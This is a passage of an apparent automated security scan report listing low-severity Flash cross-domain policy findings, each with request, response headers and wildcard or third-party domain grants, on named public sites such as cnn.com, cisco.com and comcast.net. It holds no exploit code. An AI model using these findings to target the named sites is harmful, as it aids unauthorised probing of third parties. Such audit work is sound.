<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="www.caranddriver.com" />
<allow-access-from domain="www.roadandtrack.com" />
<allow-access-from domain="www.jdpower.com" />
<allow-access-from domain="www.consumerguide.com" />
<allow-access-from domain="www.vehix.com" />
<allow-access-from domain="www.carsoup.com" />
<allow-access-from domain="www.cargurus.com" />
<allow-access-from domain="www.shopping.com" />
<allow-access-from domain="www.usnews.com" />
<allow-access-from domain="www.hybridcar.com" />
<allow-access-from domain="www.automedia.com" />
<allow-access-from domain="www.autospies.com" />
<allow-access-from domain="www.leftlanenews.com" />
<allow-access-from domain="www.autoweek.com" />
<allow-access-from domain="www.automart.com" />
<allow-access-from domain="www.thecarconnection.com" />
<allow-access-from domain="www.autotrader.com" />
<allow-access-from domain="www.autobytel.com" />
<allow-access-from domain="www.autoweb.com" />
<allow-access-from domain="www.autosite.com" />
<allow-access-from domain="www.car.com" />
<allow-access-from domain="www.carsmart.com" />
<allow-access-from domain="www.hybrid.com" />
<allow-access-from domain="www.myride.com" />
<allow-access-from domain="www.kbb.com" />
<allow-access-from domain="autos.yahoo.com" />
<allow-access-from domain="autos.msn.com" />
<allow-access-from domain="autos.aol.com" />
<allow-access-from domain="www.cars.com" />
<allow-access-from domain="www.edmunds.com" />
<allow-access-from domain="motifcdn.doubleclick.net"/>
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="betadfa.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="motifcdn2.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m1.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="*.static.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="*.s0.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="*.s1.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="presentations.digitas.com" />
...[SNIP]...
7.208. http://www.chicagotribune.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chicagotribune.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chicagotribune.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 436
Content-Type: text/xml
P3P: policyref="http://www.chicagotribune.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Thu, 03 Mar 2011 03:55:01 GMT
ETag: "1b4-4d6f1115"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:32:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*.wibbitz.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
7.209. http://www.chow.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chow.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 13 Jul 2009 20:41:54 GMT
Accept-Ranges: bytes
Content-Length: 476
nnCoection: close
Content-Type: application/xml
Cache-Control: max-age=28278968
Expires: Thu, 23 Feb 2012 20:49:12 GMT
Date: Sat, 02 Apr 2011 13:33:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.com.com"/>
   <allow-access-from domain="*.chow.com"/>
   <allow-access-from domain="*.gamespot.com"/>
   <allow-access-from domain="*.cbsig.net"/>
   <allow-access-from domain="*.cbs.com"/>
   <allow-access-from domain="*.cnet.cnwk"/>
   <allow-access-from domain="*.cnet.com"/>
...[SNIP]...
7.210. http://www.chron.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chron.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chron.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
Last-Modified: Thu, 31 Mar 2011 00:53:27 GMT
ETag: "16d-49fbcb89fefc0"
Accept-Ranges: bytes
Content-Length: 365
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADM DEVa TAIa PSAa PSDa CONo OUR DELo IND PHY ONL INT STA DEM UNI COM NAV"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:34:22 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.chron.com" />
<allow-access-from domain="chron.com" />
<allow-access-from domain="*.houstonchronicle.com" />
<allow-access-from domain="houstonchronicle.com" />
...[SNIP]...
7.211. http://www.cisco.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cisco.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cisco.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0
Last-Modified: Mon, 14 Mar 2011 21:47:58 GMT
ETag: "43d2df80"
Accept-Ranges: bytes
Content-Length: 454
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:38:17 GMT
CDCHOST: ccows-sj-202
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:39:20 GMT
Connection: close
Set-Cookie: CP_GUTC=72.163.4.165.1301751497878302; path=/; expires=Wed, 26-Mar-36 13:38:17 GMT; domain=.cisco.com

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.cisco.com -->
<cross-domain-poli
...[SNIP]...
<allow-access-from domain="*.cisco.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.static-cisco.com" />
   <allow-access-from domain="*.ogilvy.edgesuite.net" />
...[SNIP]...
7.212. http://www.classmates.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.classmates.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.classmates.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:30 GMT
Server: Apache
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CON HIS OTPi OUR DELi SAMi PUBi IND OTC"
Last-Modified: Wed, 23 Feb 2011 19:33:22 GMT
ETag: "1df-4d656102"
Accept-Ranges: bytes
Content-Length: 479
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!-- Version: $Id: crossdomain.xml,v 1.4 2007-07-19 02:25:13 rrufh Exp $ -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*.untd.com" />
<allow-access-from domain="*.cmates.com" />
<allow-access-from domain="*.classmates.com" />
<allow-access-from domain="*.cmcdn.com" />
<allow-access-from domain="*.cmatescdn.com" />
...[SNIP]...
7.213. http://www.clocklink.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clocklink.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clocklink.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 18 Mar 2011 13:51:58 GMT
ETag: "6600b4a-10b-49ec214e15b80"
Accept-Ranges: bytes
Content-Length: 267
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.mysite.com -->
<cross-domain-policy>
   <allow-access-from domain="*.clocklink.com" />
...[SNIP]...
7.214. http://www.clubpenguin.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.clubpenguin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clubpenguin.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Apr 2008 01:09:24 GMT
ETag: "2005b-17c-44adf0d0d9900"
Accept-Ranges: bytes
Content-Length: 380
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.clubpenguin.com" />
<allow-access-from domain="*.critteroo.com" />
<allow-access-from domain="*.critteroo.co.uk" />
<allow-access-from domain="*.clubpenguin.co.uk" />
...[SNIP]...
7.215. http://www.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:24:55 GMT
Via: 1.1 C aicache6
Content-Length: 3794
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Sat, 02 Apr 2011 13:25:55 GMT

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
...[SNIP]...
<allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
...[SNIP]...
7.216. http://www.cnet.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:05 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Length: 3257
Keep-Alive: timeout=15, max=988
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.builder.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.*.com.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.pluggd.com"/>
<allow-access-from domain="*.userplane.com"/>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.motifcdn2.doubleclick.net"/>
<allow-access-from domain="*.juegasgroup.com"/>
...[SNIP]...
7.217. http://www.cnn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cnn.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:16 GMT
Server: Apache
Set-Cookie: CG=US:TX:Dallas; path=/
Last-Modified: Fri, 03 Dec 2010 21:00:13 GMT
Accept-Ranges: bytes
Content-Length: 2326
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 13:37:32 GMT
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.cnn.com"/>
   <allow-access-from domain="*.turner.com"/>
   <allow-access-from domain="*.cnn.net"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
   <allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="*.2mdn.net"/>
   <allow-access-from domain="*.i-traffic.com"/>
   <allow-access-from domain="ar.atwola.com"/>
   <allow-access-from domain="*.itraffic.com"/>
   <allow-access-from domain="*.agency.com"/>        
   <allow-access-from domain="*.aol.com"/>
   <allow-access-from domain="*.time.com"/>
   <allow-access-from domain="*.VillageVoice.com"/>
   <allow-access-from domain="*.nymag.com"/>
   <allow-access-from domain="*.salon.com"/>    
   <allow-access-from domain="*.secondthought.com"/>    
   <allow-access-from domain="*.clk4.com"/>
   <allow-access-from domain="servedby.advertising.com"/>
   <allow-access-from domain="bannerfarm.advertising.com"/>
   <allow-access-from domain="*.advertising.com"/>
   <allow-access-from domain="*.crewintegrated.com"/>
   <allow-access-from domain="gfx.klipmart.com"/>
   <allow-access-from domain="*.klipmart.com"/>
   <allow-access-from domain="*.cnnexpansion.com"/>
   <allow-access-from domain="mediacache.travelzoo.com"/>
   <allow-access-from domain="*.cdn.turner.com"/>    
   <allow-access-from domain="staging.barbariangroup.com"/>
   <allow-access-from domain="*.spreadomat.net"/>
   <allow-access-from domain="CNNShirts.spreadshirt.com"/>        
   <allow-access-from domain="72.3.226.28"/>
   <allow-access-from domain="isg-marketing.com"/>
   <allow-access-from domain="*.isg-marketing.com"/>
   <allow-access-from domain="*isgwidgets.s3.amazonaws.com"/>    
   <allow-access-from domain="*.oprah.com"/>
   <allow-access-from domain="zuse.networld.at"/>
   <allow-access-from domain="*.fusebox.com"/>
   <allow-access-from domain="*.cnnpromos.com"/>        
<allow-access-from domain="*.rtm.com"/>
<allow-access-from domain="*.rtmweb.rtm.com"/>    
<allow-access-from domain="*.stamen.com"/>        
<allow-access-from domain="*.prizelogic.com"/>
...[SNIP]...
7.218. http://www.cobaltnitra.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cobaltnitra.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cobaltnitra.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:56:36 GMT
Server: Apache/2.2.3 (Oracle) DAV/2 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: click_tracker=10.64.64.6.1301752596078381; path=/; expires=Mon, 01-Apr-13 13:56:36 GMT
Last-Modified: Wed, 01 Sep 2010 15:08:22 GMT
ETag: "1d7206-263-48f3411876580"
Accept-Ranges: bytes
Content-Length: 611
Content-Type: text/xml
Set-Cookie: BIGipServernitra.staticweb=570966026.20480.0000; path=/
X-Cache: MISS from backend02-1
X-Cache-Lookup: MISS from backend02-1:4001
X-Cache: MISS from frontend02
X-Cache-Lookup: MISS from frontend02:3128
Via: 1.0 backend02-1 (squid), 1.0 frontend02 (squid)
Proxy-Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.cobaltnitra.com" />
   <allow-access-from domain="*.motorplace.com" />
   <allow-access-from domain="*.cobaltgroup.com" />
   <allow-access-from domain="*.cobaltmotors1.com" />
   <allow-access-from domain="*.webedge.com" />
   <allow-access-from domain="*.lexusdealer.com" />
   <allow-access-from domain="*.vwdealer.com" />
<allow-access-from domain="*.cpbinteractive.com" />
<allow-access-from domain="*.vw.com" />
...[SNIP]...
7.219. http://www.collegeboard.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.collegeboard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegeboard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:02 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 19:40:23 GMT
ETag: "116-4870bbed717c0"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.collegeboard.com" />
<allow-access-from domain="*.collegeboard.org" />
...[SNIP]...
7.220. http://www.comcast.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.comcast.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.58 (Unix)
Last-Modified: Tue, 14 Sep 2010 01:19:26 GMT
ETag: "25d5d5-444-f82380"
Accept-Ranges: bytes
Content-Length: 1092
Content-Type: application/xml
Cache-Control: max-age=2592000
Date: Sat, 02 Apr 2011 12:37:55 GMT
Connection: close

<?xml version="1.0"?>

<!--static-->

<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.xfinity.com"/>
<allow-access-from domain="*.fancast.com"/>
<allow-access-from domain="beta.comcast.net" />
<allow-access-from domain="*.cimcontent.net" />
<allow-access-from domain="chrome.comcast.net" />
<allow-access-from domain="static.comcast.net" />
<allow-access-from domain="por-img.cimcontent.net" />
<allow-access-from domain="comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcastonline.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.att.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.xcal.tv" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.teamcomcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...
7.221. http://www.consumerreports.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.consumerreports.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
